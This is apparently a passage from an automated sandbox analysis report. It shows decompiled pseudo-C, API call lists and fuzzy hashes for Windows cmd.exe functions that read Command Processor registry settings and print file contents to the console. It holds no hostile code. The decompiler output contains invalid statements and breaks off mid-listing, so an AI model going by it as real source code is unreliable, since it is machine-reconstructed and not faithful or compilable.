                                                • Part of subcall function 002B41DD: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableUNCCheck,00000000,?,?,?), ref: 002B427D
                                                • Part of subcall function 002B41DD: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,EnableExtensions,00000000,00000001,?,00001000), ref: 002B42B7
                                                • Part of subcall function 002B41DD: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 002B4307
                                                • Part of subcall function 002B41DD: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DefaultColor,00000000,00000001,?,00001000), ref: 002B4341
                                              • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 002B3DC7
                                              • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 002B3E02
                                              • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,-00000105,00000000), ref: 002B3E9E
                                              • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,002D3840), ref: 002B3EAF
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,0000020C), ref: 002B3EC0
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 002B3EC7
                                              • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104), ref: 002B3EDC
                                              • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL), ref: 002B3F07
                                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,CopyFileExW), ref: 002B3F18
                                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(IsDebuggerPresent), ref: 002B3F2E
                                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(SetConsoleInputExeNameW), ref: 002B3F3F
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002B3F5F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Console$HeapMode_get_osfhandle$QueryValue$AddressAllocCriticalProcProcessSection$CommandEnvironmentLineStrings$CtrlEnterFreeHandleHandlerInfoInitializeLeaveModuleOpenOutputTitlememcpy
                                              • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW$\8-
                                              • API String ID: 570592814-1126955722
                                              • Opcode ID: 8081530043dc5fd55fa6ede392ada4541bff2f42bdf7f70dbb04e5e0c5455f45
                                              • Instruction ID: 60d0dac595c8ed87c07ab54150d643616ad18a893101a20e19df8b4499bbb6de
                                              • Opcode Fuzzy Hash: 8081530043dc5fd55fa6ede392ada4541bff2f42bdf7f70dbb04e5e0c5455f45
                                              • Instruction Fuzzy Hash: 36A1D531A702419BDF14EF69FC9EAEA37A5EB85381B14401AF50ADB191DF70DEA0CB11
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B41DD, Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 311registryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 74%
                                              			E002B41DD(intOrPtr* __ecx) {
				signed int _v8;
				char _v4100;
				long _v4104;
				int _v4108;
				int _v4112;
				void* _v4116;
				intOrPtr _v4120;
				intOrPtr _v4124;
				char _v4128;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t85;
				int _t88;
				long _t97;
				long _t114;
				long _t127;
				long _t130;
				wchar_t* _t131;
				wchar_t* _t135;
				wchar_t* _t139;
				void* _t144;
				long _t146;
				void* _t151;
				long _t152;
				void* _t153;
				signed int _t159;
				intOrPtr* _t162;
				intOrPtr _t163;
				signed int _t166;
				void* _t167;
				void* _t189;

				E002B8290(0x101c);
				_t85 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t85 ^ _t166;
				_t162 = __ecx;
				_v4128 = 0x80000002;
				_v4124 = 0x80000001;
				_t163 = 2;
				 *0x2e3cc9 = 1;
				_t144 =  &_v4128 - __ecx;
				_v4120 = _t163;
				while(1) {
					_t88 = RegOpenKeyExW( *(_t144 + _t162), L"Software\\Microsoft\\Command Processor", 0, 0x2000000,  &_v4116);
					if(_t88 != 0) {
						goto L33;
					}
					_v4108 = _v4108 & _t88;
					_v4112 = 0x1000;
					if(RegQueryValueExW(_v4116, L"DisableUNCCheck", 0,  &_v4108,  &_v4104,  &_v4112) == 0) {
						if(_v4108 != 4) {
							if(_v4108 == 1) {
								_t139 =  &_v4104;
								__imp___wtol(_t139);
								asm("sbb al, al");
								 *0x2e8528 =  ~(_t139 - 1) + 1;
							}
						} else {
							 *0x2e8528 = _v4104 != 0;
						}
					}
					_v4112 = 0x1000;
					_t97 = RegQueryValueExW(_v4116, L"EnableExtensions", 0,  &_v4108,  &_v4104,  &_v4112);
					if(_t97 == 0) {
						if(_v4108 != 4) {
							if(_v4108 == 1) {
								_t135 =  &_v4104;
								__imp___wtol(_t135);
								asm("sbb al, al");
								 *0x2e3cc9 =  ~(_t135 - 1) + 1;
							}
						} else {
							 *0x2e3cc9 = _v4104 != _t97;
						}
					}
					_v4112 = 0x1000;
					if(RegQueryValueExW(_v4116, L"DelayedExpansion", 0,  &_v4108,  &_v4104,  &_v4112) == 0) {
						if(_v4108 != 4) {
							if(_v4108 == 1) {
								_t131 =  &_v4104;
								__imp___wtol(_t131);
								asm("sbb al, al");
								 *0x2e3cc8 =  ~(_t131 - 1) + 1;
							}
						} else {
							 *0x2e3cc8 = _v4104 != 0;
						}
					}
					_v4112 = 0x1000;
					if(RegQueryValueExW(_v4116, L"DefaultColor", 0,  &_v4108,  &_v4104,  &_v4112) != 0) {
						L11:
						_v4112 = 0x1000;
						if(RegQueryValueExW(_v4116, L"CompletionChar", 0,  &_v4108,  &_v4104,  &_v4112) != 0) {
							L19:
							_v4112 = 0x1000;
							if(RegQueryValueExW(_v4116, L"PathCompletionChar", 0,  &_v4108,  &_v4104,  &_v4112) != 0) {
								_t114 =  *0x2cd0d4; // 0x20
								0x800 = 0x20;
								L27:
								_t146 =  *0x2cd0d8; // 0x20
								if(_t146 != 0x800) {
									L29:
									if(_t189 == 0 && _t146 < 0x800) {
										 *0x2cd0d4 = _t146;
									}
									L31:
									_v4112 = 0x1000;
									if(RegQueryValueExW(_v4116, L"AutoRun", 0,  &_v4108,  &_v4104,  &_v4112) == 0) {
										if(_v4108 == 2) {
											_t159 = _v4112 >> 1;
											_t165 =  &_v4100 + _t159 * 2;
											if(ExpandEnvironmentStringsW( &_v4104,  &_v4100 + _t159 * 2, 0x7fe - _t159) == 0) {
												_v4104 = 0;
											} else {
												E002B1040( &_v4104, 0x800, _t165);
											}
											_t163 = _v4120;
										}
										if(_v4104 != 0) {
											 *_t162 = E002ADF40( &_v4104);
										}
									}
									_t88 = RegCloseKey(_v4116);
									goto L33;
								}
								_t189 = _t114 - 0x800;
								if(_t189 < 0) {
									 *0x2cd0d8 = _t114;
									goto L31;
								}
								goto L29;
							}
							if(_v4108 != 4) {
								if(_v4108 != 1) {
									_t114 =  *0x2cd0d4; // 0x20
									goto L23;
								}
								_t114 = wcstol( &_v4104, 0, 0);
								_t167 = _t167 + 0xc;
								goto L22;
							} else {
								_t114 = _v4104;
								L22:
								 *0x2cd0d4 = _t114;
								L23:
								if(_t114 == 0) {
									0x800 = 0x20;
									L26:
									_t114 = 0x800;
									 *0x2cd0d4 = 0x800;
									goto L27;
								}
								_t151 = 0xd;
								0x800 = 0x20;
								if(_t114 == _t151 || _t114 > 0x800) {
									goto L26;
								} else {
									goto L27;
								}
							}
						}
						if(_v4108 != 4) {
							if(_v4108 != 1) {
								_t127 =  *0x2cd0d8; // 0x20
								goto L15;
							}
							_t127 = wcstol( &_v4104, 0, 0);
							_t167 = _t167 + 0xc;
							goto L14;
						} else {
							_t127 = _v4104;
							L14:
							 *0x2cd0d8 = _t127;
							L15:
							if(_t127 == 0) {
								_t152 = 0x20;
								L18:
								 *0x2cd0d8 = _t152;
								goto L19;
							}
							_t153 = 0xd;
							_t152 = 0x20;
							if(_t127 == _t153 || _t127 > _t152) {
								goto L18;
							} else {
								goto L19;
							}
						}
					} else {
						if(_v4108 != 4) {
							if(_v4108 != 1) {
								goto L11;
							}
							_t130 = wcstol( &_v4104, 0, 0);
							_t167 = _t167 + 0xc;
							goto L10;
						} else {
							_t130 = _v4104;
							L10:
							 *0x2cd5a0 = _t130;
							goto L11;
						}
					}
					L33:
					_t162 = _t162 + 4;
					_t163 = _t163 - 1;
					_v4120 = _t163;
					if(_t163 == 0) {
						__imp__time();
						srand(_t88);
						return E002B6FD0(_t88, _t144, _v8 ^ _t166, 0x800, _t162, _t163, 0);
					}
				}
			}



































                                              0x002b41e7
                                              0x002b41ec
                                              0x002b41f3
                                              0x002b41fb
                                              0x002b41fd
                                              0x002b420d
                                              0x002b4217
                                              0x002b4218
                                              0x002b421f
                                              0x002b4221
                                              0x002b4227
                                              0x002b423d
                                              0x002b4245
                                              0x00000000
                                              0x00000000
                                              0x002b424b
                                              0x002b425e
                                              0x002b4285
                                              0x002be517
                                              0x002be533
                                              0x002be539
                                              0x002be540
                                              0x002be54a
                                              0x002be54e
                                              0x002be54e
                                              0x002be519
                                              0x002be520
                                              0x002be520
                                              0x002be517
                                              0x002b4291
                                              0x002b42b7
                                              0x002b42bf
                                              0x002b42c8
                                              0x002be55f
                                              0x002be565
                                              0x002be56c
                                              0x002be576
                                              0x002be57a
                                              0x002be57a
                                              0x002b42ce
                                              0x002b42d4
                                              0x002b42d4
                                              0x002b42c8
                                              0x002b42e1
                                              0x002b430f
                                              0x002be58b
                                              0x002be5a7
                                              0x002be5ad
                                              0x002be5b4
                                              0x002be5be
                                              0x002be5c2
                                              0x002be5c2
                                              0x002be58d
                                              0x002be594
                                              0x002be594
                                              0x002be58b
                                              0x002b431b
                                              0x002b4349
                                              0x002b4365
                                              0x002b436b
                                              0x002b4399
                                              0x002b43d5
                                              0x002b43db
                                              0x002b4409
                                              0x002be65c
                                              0x002be664
                                              0x002b444a
                                              0x002b444a
                                              0x002b4454
                                              0x002b4463
                                              0x002b4463
                                              0x002b44f0
                                              0x002b44f0
                                              0x002b446e
                                              0x002b4474
                                              0x002b44a2
                                              0x002be67c
                                              0x002be68a
                                              0x002be69a
                                              0x002be6a7
                                              0x002be6be
                                              0x002be6a9
                                              0x002be6b5
                                              0x002be6b5
                                              0x002be6c5
                                              0x002be6c5
                                              0x002be6d3
                                              0x002be6e4
                                              0x002be6e4
                                              0x002be6d3
                                              0x002b44ae
                                              0x00000000
                                              0x002b44ae
                                              0x002b445a
                                              0x002b445d
                                              0x002be66a
                                              0x00000000
                                              0x002be66a
                                              0x00000000
                                              0x002b445d
                                              0x002b4416
                                              0x002be62e
                                              0x002be649
                                              0x00000000
                                              0x002be649
                                              0x002be63b
                                              0x002be641
                                              0x00000000
                                              0x002b441c
                                              0x002b441c
                                              0x002b4423
                                              0x002b4423
                                              0x002b4429
                                              0x002b442c
                                              0x002be656
                                              0x002b4442
                                              0x002b4442
                                              0x002b4444
                                              0x00000000
                                              0x002b4444
                                              0x002b4434
                                              0x002b4437
                                              0x002b443b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b443b
                                              0x002b4416
                                              0x002b43a2
                                              0x002be5f9
                                              0x002be614
                                              0x00000000
                                              0x002be614
                                              0x002be606
                                              0x002be60c
                                              0x00000000
                                              0x002b43a8
                                              0x002b43a8
                                              0x002b43af
                                              0x002b43af
                                              0x002b43b5
                                              0x002b43b8
                                              0x002be621
                                              0x002b43ce
                                              0x002b43ce
                                              0x00000000
                                              0x002b43ce
                                              0x002b43c0
                                              0x002b43c6
                                              0x002b43c7
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b43c7
                                              0x002b434b
                                              0x002b4352
                                              0x002be5d3
                                              0x00000000
                                              0x00000000
                                              0x002be5e4
                                              0x002be5ea
                                              0x00000000
                                              0x002b4358
                                              0x002b4358
                                              0x002b435f
                                              0x002b435f
                                              0x00000000
                                              0x002b435f
                                              0x002b4352
                                              0x002b44b4
                                              0x002b44b4
                                              0x002b44b7
                                              0x002b44ba
                                              0x002b44c0
                                              0x002b44c8
                                              0x002b44cf
                                              0x002b44e7
                                              0x002b44e7
                                              0x002b44c0

                                              APIs
                                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 002B423D
                                              • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableUNCCheck,00000000,?,?,?), ref: 002B427D
                                              • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,EnableExtensions,00000000,00000001,?,00001000), ref: 002B42B7
                                              • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 002B4307
                                              • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DefaultColor,00000000,00000001,?,00001000), ref: 002B4341
                                              • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,CompletionChar,00000000,00000001,?,00001000), ref: 002B4391
                                              • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,PathCompletionChar,00000000,00000001,?,00001000), ref: 002B4401
                                              • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,AutoRun,00000000,00000004,?,00001000), ref: 002B449A
                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 002B44AE
                                              • time.MSVCRT ref: 002B44C8
                                              • srand.MSVCRT ref: 002B44CF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: QueryValue$CloseOpensrandtime
                                              • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                              • API String ID: 145004033-3846321370
                                              • Opcode ID: 9491083d0e9134ba891d4debeb150e09030e1592e6d6d22b53341e4044f0f0c1
                                              • Instruction ID: 0533e2a7bf9f0db7f64e5011d3d0ee0d5d6f14ba2120cb3e3729e860ba20882f
                                              • Opcode Fuzzy Hash: 9491083d0e9134ba891d4debeb150e09030e1592e6d6d22b53341e4044f0f0c1
                                              • Instruction Fuzzy Hash: 10C1C5349602A9EADF319F10DD88BD977B8FB08342F1040E7E689E6191D6B05EE8CF15
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C65A0, Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 430fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 52%
                                              			E002C65A0(WCHAR* __edx, WCHAR* _a4, long _a8, WCHAR* _a12, long _a16, signed int _a20, int _a24, short* _a28, void* _a32, signed int _a36, signed int _a40, WCHAR* _a44, WCHAR* _a48, void* _a52, long _a56, char _a60, intOrPtr _a68, void _a72, void* _a592, char _a596, long _a600, void _a608, void _a610, short _a1128, signed int _a4204) {
				void* _v0;
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t137;
				WCHAR* _t150;
				void* _t155;
				long _t157;
				WCHAR* _t160;
				signed int _t161;
				WCHAR* _t164;
				void* _t172;
				long _t174;
				WCHAR* _t175;
				signed int _t176;
				WCHAR* _t178;
				long _t181;
				WCHAR* _t182;
				WCHAR* _t183;
				WCHAR* _t184;
				void* _t190;
				long _t192;
				WCHAR* _t195;
				int _t197;
				void* _t198;
				WCHAR* _t199;
				void* _t202;
				WCHAR* _t206;
				long _t208;
				void* _t212;
				void* _t213;
				void* _t222;
				unsigned int _t226;
				WCHAR* _t228;
				void* _t232;
				unsigned int _t234;
				void* _t235;
				long _t245;
				int _t246;
				WCHAR* _t251;
				WCHAR* _t252;
				signed char* _t254;
				intOrPtr _t257;
				WCHAR* _t258;
				union _LARGE_INTEGER _t263;
				void* _t264;
				void* _t266;
				void* _t267;
				int _t268;
				WCHAR* _t269;
				signed int _t270;
				signed int _t273;
				signed int _t274;
				signed int _t275;

				_t253 = __edx;
				_t274 = _t273 & 0xfffffff8;
				E002B8290(0x1074);
				_t137 =  *0x2cd0b4; // 0x40f69e4c
				_a4204 = _t137 ^ _t274;
				_a56 = _a56 | 0xffffffff;
				_t262 = _a4;
				_a600 = 0x104;
				_a48 = _a4;
				_t266 = 0;
				_a52 = 0;
				_t212 = 1;
				_a20 = 0;
				_a60 = 0x7fffffff;
				_a32 = 0;
				_a36 = 0;
				_a40 = 1;
				_a592 = 0;
				_a596 = 1;
				memset( &_a72, 0, 0x104);
				_t275 = _t274 + 0xc;
				if(E002B0C70( &_a72, ((0 | _a596 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
					_t253 = 0;
					_t263 = E002AD120(_t262, 0,  &_a72);
					__eflags = _t263 - 0xffffffff;
					if(_t263 != 0xffffffff) {
						L13:
						_a28 =  &_a608;
						_t150 = E002B0178( &_a608);
						__eflags = _t150;
						if(_t150 == 0) {
							_t202 =  &_a60;
							__imp___get_osfhandle(_t202);
							_a56 = GetFileSize(_t202, _t263);
							__imp___get_osfhandle(0);
							SetFilePointer(0, _t263, 0, 0);
							_t30 =  &_a36;
							 *_t30 = _a36 & _t266;
							__eflags =  *_t30;
							_a32 = _t212;
						}
						while(1) {
							L15:
							__eflags =  *0x2cd544;
							if( *0x2cd544 != 0) {
								break;
							}
							_t155 =  &_a608;
							__imp___get_osfhandle(_t155, 0x200,  &_a4, 0);
							_t222 = _t263;
							_t156 = ReadFile(_t155, ??, ??, ??, ??);
							__eflags = _t156;
							if(_t156 == 0) {
								L81:
								_t157 = GetLastError();
								_push(0);
								_push(_t157);
								 *0x2e3cf0 = _t157;
								E002AC5A2(_t222);
								L82:
								E002ADB92(_t263);
								_t212 = 0;
								goto L87;
							}
							_t226 = _a4;
							__eflags = _t226;
							if(_t226 == 0) {
								goto L82;
							}
							__eflags = _a40;
							if(_a40 == 0) {
								L21:
								_a24 = _t226;
								__eflags = _t266;
								if(_t266 == 0) {
									L25:
									_t160 = E002B269C(_t156);
									__eflags = _t160;
									if(_t160 != 0) {
										L28:
										_t268 = _a4;
										_t254 =  &_a608;
										_t228 = _t268;
										__eflags = _t268;
										while(1) {
											_a12 = _t228;
											if(__eflags == 0) {
												break;
											}
											_t161 =  *_t254 & 0x000000ff;
											__eflags =  *((char*)(_t161 + 0x2e7f30));
											if( *((char*)(_t161 + 0x2e7f30)) == 0) {
												L31:
												_t254 =  &(_t254[1]);
												_t228 = _t228 - 1;
												__eflags = _t228;
												continue;
											}
											_t253 =  &(_t254[1]);
											_t228 = _t228 - 1;
											__eflags = _t228;
											_a12 = _t228;
											if(_t228 == 0) {
												_t198 =  &_a12;
												__imp___get_osfhandle(_t253, _t212, _t198, 0);
												_t222 = _t263;
												_t199 = ReadFile(_t198, ??, ??, ??, ??);
												__eflags = _t199;
												if(_t199 == 0) {
													goto L81;
												}
												_t268 =  &(_a4[0]);
												__eflags = _t268;
												_a4 = _t268;
												_a24 = _t268;
												L36:
												_a28 = _a28 & 0x00000000;
												_t253 =  &_a608;
												_t164 = E002C6CEF(_t212,  &_a608,  &_a24,  &_a28);
												__eflags = _t164;
												if(_t164 != 0) {
													L39:
													_t269 = MultiByteToWideChar( *0x2d3854, 0,  &_a608, _t268,  &_a1128, 0x400);
													_a12 = _t269;
													__eflags = _t269;
													if(_t269 == 0) {
														_t269 = 0x400;
														_a12 = 0x400;
													}
													_t226 = _a4;
													_a28 =  &_a1128;
													L42:
													__eflags = _a40;
													if(_a40 != 0) {
														__eflags =  *0x2e3cd0;
														if( *0x2e3cd0 != 0) {
															E002AC5A2(_t226, 0x2354, _t212, _a48);
															_t226 = _a4;
															_t275 = _t275 + 0xc;
															_t269 = _a12;
														}
														_t75 =  &_a40;
														 *_t75 = _a40 & 0x00000000;
														__eflags =  *_t75;
													}
													_v0 = _a28;
													__eflags = _t269;
													if(_t269 <= 0) {
														L74:
														_t270 = _a32;
														_t253 = _a36;
														__eflags = _t270 | _t253;
														if((_t270 | _t253) != 0) {
															_t172 =  &_a32;
															__imp___get_osfhandle(_t172, _t212);
															SetFilePointerEx(_t172, _t263, 0, 0);
															_t253 = _a36;
															_t270 = _a32;
															_t226 = _a4;
														}
														__eflags = _t226 - _a24;
														if(_t226 != _a24) {
															goto L82;
														} else {
															__eflags = _a60 - _t253;
															if(__eflags < 0) {
																goto L82;
															}
															if(__eflags > 0) {
																L80:
																_t266 = _a20;
																goto L15;
															}
															__eflags = _a56 - _t270;
															if(_a56 <= _t270) {
																goto L82;
															}
															goto L80;
														}
													} else {
														do {
															_t174 = 0x50;
															__eflags = _t269 - _t174;
															if(_t269 <= _t174) {
																_a8 = _t269;
																__eflags = _t269;
																if(_t269 == 0) {
																	break;
																}
																L50:
																__eflags =  *0x2cd544;
																if( *0x2cd544 != 0) {
																	goto L86;
																}
																_t175 = E002B269C(_t174);
																__eflags = _t175;
																if(_t175 == 0) {
																	__eflags =  *0x2e805c;
																	if( *0x2e805c != 0) {
																		__eflags = _a20;
																		if(_a20 == 0) {
																			_t176 = _a8;
																			_t232 = _v0;
																			L62:
																			_a68 = _t176 + _t176;
																			_t178 = E002B27C8(_t176 + _t176, _t232, _t176 + _t176,  &_a16);
																			__eflags = _a12;
																			_t257 = _v8;
																			_a36 = _t178;
																			if(_a12 != 0) {
																				 *((short*)(_a68 + _t257)) = _a52;
																			}
																			_t234 = _a16;
																			_t269 = _t269 - (_t234 >> 1);
																			_t181 = _a8;
																			_t258 = _t257 + _t234;
																			__eflags = _t258;
																			_v0 = _t258;
																			L65:
																			_t253 = _a44;
																			L66:
																			__eflags = _t253;
																			if(_t253 == 0) {
																				L68:
																				_t182 = GetLastError();
																				 *0x2e3cf0 = _t182;
																				__eflags = _t182;
																				if(_t182 == 0) {
																					 *0x2e3cf0 = 0x70;
																				}
																				_t235 = _t212;
																				_t183 = E002B0178(_t182);
																				__eflags = _t183;
																				if(_t183 == 0) {
																					_t236 = _t212;
																					_t184 = E002C9953(_t183, _t212);
																					__eflags = _t184;
																					if(_t184 == 0) {
																						E002C985A( *0x2e3cf0);
																					} else {
																						_push(0);
																						_push(0x2364);
																						E002AC5A2(_t236);
																					}
																					goto L86;
																				} else {
																					_push(0);
																					_push(0x1d);
																					E002AC5A2(_t235);
																					goto L72;
																				}
																			}
																			__eflags = _t234 - _t181 + _t181;
																			if(_t234 == _t181 + _t181) {
																				goto L72;
																			}
																			goto L68;
																		}
																		L60:
																		_t176 = _a8;
																		_t232 = _v0;
																		_a52 =  *(_t232 + _t176 * 2) & 0x0000ffff;
																		 *(_t232 + _t176 * 2) = 0;
																		goto L62;
																	}
																	__eflags = _a20;
																	if(_a20 != 0) {
																		goto L60;
																	}
																	_t190 = _a8;
																	L58:
																	__imp___get_osfhandle(0);
																	_t253 = WriteFile(_t190, _t212, _v0, _t190,  &_a16);
																	_t192 = _a16;
																	_t269 = _t269 - _t192;
																	_v0 = _v0 + _t192;
																	_t234 = _t192 + _t192;
																	_t181 = _a8;
																	_a16 = _t234;
																	goto L66;
																}
																_t195 = WriteConsoleW(GetStdHandle(0xfffffff5), _v0, _a8,  &_a16, 0);
																_a44 = _t195;
																__eflags = _t195;
																_t190 = _a8;
																if(_t195 == 0) {
																	goto L58;
																}
																_t245 = _a16;
																__eflags = _t245 - _t190;
																if(_t245 != _t190) {
																	goto L58;
																}
																_t269 = _t269 - _t245;
																_t234 = _t245 + _t245;
																_v0 = _v0 + _t234;
																_a16 = _t234;
																goto L65;
															}
															_a8 = _t174;
															goto L50;
															L72:
															__eflags = _t269;
														} while (_t269 > 0);
														_t226 = _a4;
														goto L74;
													}
												}
												_t197 = _a24;
												__eflags = _t197;
												if(_t197 == 0) {
													goto L82;
												}
												_t268 = _t197;
												goto L39;
											}
											goto L31;
										}
										goto L36;
									}
									__eflags =  *0x2e805c - _t160;
									if( *0x2e805c != _t160) {
										goto L28;
									}
									_t226 = _a4;
									_t269 = _t226;
									L23:
									_a12 = _t269;
									goto L42;
								}
								_t269 = _t226 >> 1;
								__eflags = _t269;
								goto L23;
							}
							_t156 = 0xfeff;
							__eflags = _a608 - 0xfeff;
							if(_a608 != 0xfeff) {
								_t45 =  &_a20;
								 *_t45 = _a20 & 0x00000000;
								__eflags =  *_t45;
								_a24 = _t226;
								goto L25;
							}
							_t246 = _t226 - 2;
							__eflags = _t246;
							_a4 = _t246;
							_t266 = _t212;
							_a20 = _t266;
							_t156 = memmove( &_a608,  &_a610, _t246);
							_t226 = _a4;
							_t275 = _t275 + 0xc;
							goto L21;
						}
						L86:
						E002ADB92(_t263);
						goto L87;
					}
					_t206 = E002B3320(L"DPATH");
					__eflags = _t206;
					if(_t206 == 0) {
						L11:
						_t250 =  *0x2e3cf0;
						__eflags =  *0x2e3cf0 - 0x7b;
						if( *0x2e3cf0 == 0x7b) {
							_t250 = 2;
							 *0x2e3cf0 = _t250;
						}
						goto L2;
					}
					_t251 = _a592;
					__eflags = _t251;
					if(_t251 == 0) {
						_t251 =  &_a72;
					}
					_t208 = SearchPathW(_t206, _a48, 0, _a600, _t251, 0);
					__eflags = _t208;
					if(_t208 == 0) {
						goto L11;
					}
					_t252 = _a592;
					__eflags = _t252;
					if(_t252 == 0) {
						_t252 =  &_a72;
					}
					_t253 = 0;
					_t263 = E002AD120(_t252, 0, _t252);
					__eflags = _t263 - 0xffffffff;
					if(_t263 != 0xffffffff) {
						goto L13;
					} else {
						goto L11;
					}
				} else {
					_t250 = 8;
					L2:
					E002C985A(_t250);
					L87:
					__imp__??_V@YAXPAX@Z(_a592);
					_pop(_t264);
					_pop(_t267);
					_pop(_t213);
					return E002B6FD0(_t212, _t213, _a4204 ^ _t275, _t253, _t264, _t267);
				}
			}


























































                                              0x002c65a0
                                              0x002c65a5
                                              0x002c65ad
                                              0x002c65b2
                                              0x002c65b9
                                              0x002c65c0
                                              0x002c65ca
                                              0x002c65d3
                                              0x002c65e1
                                              0x002c65e5
                                              0x002c65e7
                                              0x002c65eb
                                              0x002c65ec
                                              0x002c65f1
                                              0x002c65f9
                                              0x002c65fd
                                              0x002c6601
                                              0x002c6605
                                              0x002c660c
                                              0x002c6613
                                              0x002c661e
                                              0x002c663e
                                              0x002c664e
                                              0x002c6657
                                              0x002c6659
                                              0x002c665c
                                              0x002c66cd
                                              0x002c66d6
                                              0x002c66da
                                              0x002c66df
                                              0x002c66e1
                                              0x002c66e3
                                              0x002c66e9
                                              0x002c66f7
                                              0x002c6701
                                              0x002c6709
                                              0x002c670f
                                              0x002c670f
                                              0x002c670f
                                              0x002c6713
                                              0x002c6713
                                              0x002c6717
                                              0x002c6717
                                              0x002c6717
                                              0x002c671e
                                              0x00000000
                                              0x00000000
                                              0x002c6730
                                              0x002c6739
                                              0x002c673f
                                              0x002c6741
                                              0x002c6747
                                              0x002c6749
                                              0x002c6aad
                                              0x002c6aad
                                              0x002c6ab3
                                              0x002c6ab5
                                              0x002c6ab6
                                              0x002c6abb
                                              0x002c6ac2
                                              0x002c6ac4
                                              0x002c6ac9
                                              0x00000000
                                              0x002c6ac9
                                              0x002c674f
                                              0x002c6753
                                              0x002c6755
                                              0x00000000
                                              0x00000000
                                              0x002c675b
                                              0x002c6760
                                              0x002c679c
                                              0x002c679c
                                              0x002c67a0
                                              0x002c67a2
                                              0x002c67ba
                                              0x002c67bc
                                              0x002c67c1
                                              0x002c67c3
                                              0x002c67d5
                                              0x002c67d5
                                              0x002c67d9
                                              0x002c67e0
                                              0x002c67e2
                                              0x002c6800
                                              0x002c6800
                                              0x002c6804
                                              0x00000000
                                              0x00000000
                                              0x002c67e6
                                              0x002c67e9
                                              0x002c67f0
                                              0x002c67fc
                                              0x002c67fc
                                              0x002c67fd
                                              0x002c67fd
                                              0x00000000
                                              0x002c67fd
                                              0x002c67f2
                                              0x002c67f3
                                              0x002c67f3
                                              0x002c67f6
                                              0x002c67fa
                                              0x002c680a
                                              0x002c6812
                                              0x002c6818
                                              0x002c681a
                                              0x002c6820
                                              0x002c6822
                                              0x00000000
                                              0x00000000
                                              0x002c682c
                                              0x002c682c
                                              0x002c682d
                                              0x002c6831
                                              0x002c6835
                                              0x002c6835
                                              0x002c6846
                                              0x002c684d
                                              0x002c6852
                                              0x002c6854
                                              0x002c6864
                                              0x002c6888
                                              0x002c688a
                                              0x002c688e
                                              0x002c6890
                                              0x002c6892
                                              0x002c6897
                                              0x002c6897
                                              0x002c689b
                                              0x002c68a6
                                              0x002c68aa
                                              0x002c68aa
                                              0x002c68af
                                              0x002c68b1
                                              0x002c68b8
                                              0x002c68c4
                                              0x002c68c9
                                              0x002c68cd
                                              0x002c68d0
                                              0x002c68d0
                                              0x002c68d4
                                              0x002c68d4
                                              0x002c68d4
                                              0x002c68d4
                                              0x002c68dd
                                              0x002c68e1
                                              0x002c68e3
                                              0x002c6a5d
                                              0x002c6a5d
                                              0x002c6a63
                                              0x002c6a67
                                              0x002c6a69
